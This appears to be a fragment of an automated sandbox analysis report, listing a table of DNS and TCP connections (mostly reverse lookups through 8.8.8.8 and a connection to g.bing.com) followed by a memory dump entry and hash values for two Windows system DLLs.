| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
memory/1180-0-0x0000000000400000-0x000000000040D000-memory.dmp
C:\Windows\System32\shlwapi.dll
| MD5 | 800fb7d0317b3ab92f7099516acb49e0 |
| SHA1 | 3e2ace507216082b1882098d2fe19a9cf2981731 |
| SHA256 | 4e9fb3235a2665f139ed2d3f9068cae8377614030e911e6398da91c526fe4729 |
| SHA512 | 5cc8498da97f25d40fadd2c28b70cbf20393a8e5cdba94f9fbb76820fefe51b62bd695aeacff3379be5b0ea4339d05aeeb2ceb76f69ad19777dcf8ef8342e5a7 |
C:\Windows\System32\windows.storage.dll
| MD5 | 97911ac8994e09679bf973f8efc49c40 |
| SHA1 | c15af8f29b7fa92caad1abbffcb04bde7c40e99d |
| SHA256 | 5195514bd26d15bbe830b3ebd0f96111d856088e1e9d81722ef09ada4d222021 |
| SHA512 | 04577b9fbe0bb284b7881d6be2b3de5ac702753fa2040fe97dbd93654839f65cbcf5b19438fb824cee82b4f1cc8d216d09b5cb5d5cebc6f7f1d4de7a77cb016a |